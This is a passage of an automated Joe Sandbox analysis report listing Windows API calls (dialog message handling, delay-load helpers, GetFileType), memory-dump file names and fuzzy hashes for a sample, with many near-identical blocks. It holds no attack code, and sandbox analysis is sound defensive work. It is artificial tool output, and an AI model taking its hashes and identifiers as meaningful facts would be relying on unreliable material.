                                                                                                                    APIs
                                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00051B3E), ref: 0005DD92
                                                                                                                      • Part of subcall function 0005B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005B579
                                                                                                                      • Part of subcall function 0005B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005B58A
                                                                                                                      • Part of subcall function 0005B568: IsDialogMessageW.USER32(00010458,?), ref: 0005B59E
                                                                                                                      • Part of subcall function 0005B568: TranslateMessage.USER32(?), ref: 0005B5AC
                                                                                                                      • Part of subcall function 0005B568: DispatchMessageW.USER32(?), ref: 0005B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 897784432-0
                                                                                                                    • Opcode ID: c51083655de05ce9ffe47cc99f292e66d37acf3def1908bb809fd457138e6e30
                                                                                                                    • Instruction ID: 5342c4ee6d90c88892bf8435d4300c600cfd43ec23a8ebf81d962ccc8f1bb2bc
                                                                                                                    • Opcode Fuzzy Hash: c51083655de05ce9ffe47cc99f292e66d37acf3def1908bb809fd457138e6e30
                                                                                                                    • Instruction Fuzzy Hash: 3DD09E32144300BAE6112B51CD06F1F7AA2BB88B05F404554B685740B28B72AD21DB11
                                                                                                                    APIs
                                                                                                                    • DloadProtectSection.DELAYIMP ref: 0005E5E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DloadProtectSection
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2203082970-0
                                                                                                                    • Opcode ID: 960d0ba0a49b6ac80f78bcba906c94334fe61b4d2a5560a8572e6d649b4e6d1f
                                                                                                                    • Instruction ID: 266626482868f24bdcef591dc329935ff815b72455ada2c9410788e23408868f
                                                                                                                    • Opcode Fuzzy Hash: 960d0ba0a49b6ac80f78bcba906c94334fe61b4d2a5560a8572e6d649b4e6d1f
                                                                                                                    • Instruction Fuzzy Hash: D4D0A7B00806D04AE209EB94DC457D632947315753F800040F9C9910D1EA6843888601
                                                                                                                    APIs
                                                                                                                    • GetFileType.KERNELBASE(000000FF,000497BE), ref: 000498C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3081899298-0
                                                                                                                    • Opcode ID: bd16769e6834404e49936f29927f564b96f9762ea356e4a1b72baf89eb7f62db
                                                                                                                    • Instruction ID: 2f1e894c459bcaf7e70fc95aa65e5b45d254cafb5ac482ca179a433696552f3a
                                                                                                                    • Opcode Fuzzy Hash: bd16769e6834404e49936f29927f564b96f9762ea356e4a1b72baf89eb7f62db
                                                                                                                    • Instruction Fuzzy Hash: 67C01274400105858E60462898440967351AB533657B487BCC068850E1C726CC87EA14
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 9d977304b1384e4d078de69e052c6845c44cfd9d0954eaabe306de176d547340
                                                                                                                    • Instruction ID: b8558f3dd519e4756e8c1b8680fdecabf8390f1c04ae69223ac804cfc956752a
                                                                                                                    • Opcode Fuzzy Hash: 9d977304b1384e4d078de69e052c6845c44cfd9d0954eaabe306de176d547340
                                                                                                                    • Instruction Fuzzy Hash: 6AB012F5258580BC320C1185DE03C3B020DC3C2B12330C43FFC49C8481DC44AF490435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: eb3b2148ce92bab896bf3b7c09ef29f146eddfd34395cc1b673ff6753e9d5bf1
                                                                                                                    • Instruction ID: 80e90674f6620a185d5a1259c28cecf4c7fbe6932b358af900bc955c0f454576
                                                                                                                    • Opcode Fuzzy Hash: eb3b2148ce92bab896bf3b7c09ef29f146eddfd34395cc1b673ff6753e9d5bf1
                                                                                                                    • Instruction Fuzzy Hash: 85B092E5258580AC320851899E02C3B020DC381B12320802EBC49C808198446E480535
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: f64f97c80b64358c5eab6568a5b9a92dd24f16b91a72aac827cf81d101cdf859
                                                                                                                    • Instruction ID: 6841902e926ba29d9a7d367ef15ef9d21ae59b34ad7936bb7068bf180cbe24d4
                                                                                                                    • Opcode Fuzzy Hash: f64f97c80b64358c5eab6568a5b9a92dd24f16b91a72aac827cf81d101cdf859
                                                                                                                    • Instruction Fuzzy Hash: 7EB092E1258480AC320852459E02C3B020DC3C2B12320C02EBC49C81819844AA490435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: e1e21edba1baaa2628e0585fd69e5f43607916963c94068d6bb4ec2ea9e72ded
                                                                                                                    • Instruction ID: 25a25c046a1bed85c74d6296363c3cd9302d035978dc2f2be875af47da23a06f
                                                                                                                    • Opcode Fuzzy Hash: e1e21edba1baaa2628e0585fd69e5f43607916963c94068d6bb4ec2ea9e72ded
                                                                                                                    • Instruction Fuzzy Hash: 63B092E1258580BC324852459E02C3B020DC3C1B12320812EBC49C818198446A880435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 2fc04965cd8502f6a9fce4e43e940a3955c3d781f34d44eabc8755512589ae1e
                                                                                                                    • Instruction ID: 510b3e124969c3e3bac282bc23a573ec4ee10ae7c713038ac5a60fc0f4d18cee
                                                                                                                    • Opcode Fuzzy Hash: 2fc04965cd8502f6a9fce4e43e940a3955c3d781f34d44eabc8755512589ae1e
                                                                                                                    • Instruction Fuzzy Hash: 14B092E1298480AC320852459E02C3B020DC3C1B12320802EBC49C81819C556B4D0435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 64ef403c2d343d999e7e6ae248d800bde53e07a34daf22449f48c7ee3a922e72
                                                                                                                    • Instruction ID: 0713cebb7688682b4f801da0f86ad06428fc29ed0850e33b0b0e94cb0a645551
                                                                                                                    • Opcode Fuzzy Hash: 64ef403c2d343d999e7e6ae248d800bde53e07a34daf22449f48c7ee3a922e72
                                                                                                                    • Instruction Fuzzy Hash: BEB092F1258480BC320851459E02C3B020DC382B12320802EBC49C80819844AB490435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 579a21ff84c08d5096b61fcff7622c7774d5236821e4fe31ab6a20948b4ea60c
                                                                                                                    • Instruction ID: ed81ca0caa7ac8993d9a7def7354c635962dca7e5035656302a039ab1375878f
                                                                                                                    • Opcode Fuzzy Hash: 579a21ff84c08d5096b61fcff7622c7774d5236821e4fe31ab6a20948b4ea60c
                                                                                                                    • Instruction Fuzzy Hash: 34B012F1258580BC324C5145DE02C3B020DC3C1F12330813FFC5DC8081DC456F880435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 93f50a3ce49f60fe0afaa992c283f619379f7933fdcf7c30523720c5124a8de4
                                                                                                                    • Instruction ID: 967f4ad07a1b7661780e9c0b589db0a92b57f51fab0356d994f7c53683fc0635
                                                                                                                    • Opcode Fuzzy Hash: 93f50a3ce49f60fe0afaa992c283f619379f7933fdcf7c30523720c5124a8de4
                                                                                                                    • Instruction Fuzzy Hash: 72B092F1258480AC320851459E02C3B020DC381B12320802EBC4AC8081DC456B490435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 0d6edd6c559a264e59583ed4de968ba7367c930d92d02bcd4d0073b1010f803f
